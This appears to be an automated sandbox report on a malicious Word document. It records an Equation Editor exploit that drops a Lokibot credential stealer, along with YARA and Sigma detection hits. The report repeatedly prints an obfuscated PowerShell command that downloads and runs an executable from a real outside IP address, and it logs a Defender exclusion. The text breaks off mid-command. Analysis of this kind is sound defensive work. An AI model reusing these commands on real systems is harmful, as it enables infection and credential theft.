18.2.wininit.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
16.2.wininit.exe.3288de0.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
16.2.wininit.exe.3288de0.4.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
16.2.wininit.exe.3288de0.4.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
16.2.wininit.exe.3288de0.4.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
16.2.wininit.exe.3288de0.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 37 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 66.63.187.231, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3752, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3752, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\goodtoseeuthatgreatthingswithentirethingsgreatfor[1].hta

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3752, Protocol: tcp, SourceIp: 66.63.187.231, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Roaming\wininit.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 2092, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 2164, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", CommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgI

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3752, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , ProcessId: 3820, ProcessName: mshta.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, ProcessId: 4016, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wininit.exe, NewProcessName: C:\Users\user\AppData\Roaming\wininit.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wininit.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 2092, ProcessName: wininit.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", ProcessId: 1908, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3292, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3292, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", CommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgI

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3292, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Temp\ks3ogfke.stg.ps1

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wininit.exe, NewProcessName: C:\Users\user\AppData\Roaming\wininit.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wininit.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 2092, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 772, ProcessName: wininit.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; 